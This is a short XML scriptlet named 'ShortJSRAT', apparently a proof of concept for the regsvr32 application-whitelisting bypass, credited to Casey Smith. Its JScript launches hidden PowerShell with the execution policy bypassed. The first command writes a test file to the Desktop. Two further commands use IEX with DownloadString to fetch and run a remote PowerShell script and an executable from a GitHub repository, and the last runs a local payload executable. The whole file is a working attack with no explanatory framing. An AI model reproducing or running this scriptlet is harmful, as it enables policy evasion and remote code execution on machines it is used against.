<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Learn from Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
			rat="powershell -nop -exec bypass -c $DesktopPath = [Environment]::GetFolderPath('Desktop');echo 'Regsvr32Bypass.' >> $DesktopPath\\WLtester.txt";
		new ActiveXObject("WScript.Shell").Run(rat,0,true);
			rat1="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://github.com/NotSurprised/LoremIpsumDolorSitAmetconsEctetur/raw/master/Payload/Regsvr32Bypass/Regsvr32Bypass.ps1')";
		new ActiveXObject("WScript.Shell").Run(rat1,0,true);
			rat2="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://github.com/NotSurprised/LoremIpsumDolorSitAmetconsEctetur/raw/master/Payload/Regsvr32Bypass/Regsvr32OnlinePayload.exe')";
		new ActiveXObject("WScript.Shell").Run(rat2,0,true);
			rat3="powershell -nop -exec bypass -c ./Regsvr32OfflinePayload.exe";
		new ActiveXObject("WScript.Shell").Run(rat3,0,true);
		]]>
</script>
</registration>
</scriptlet>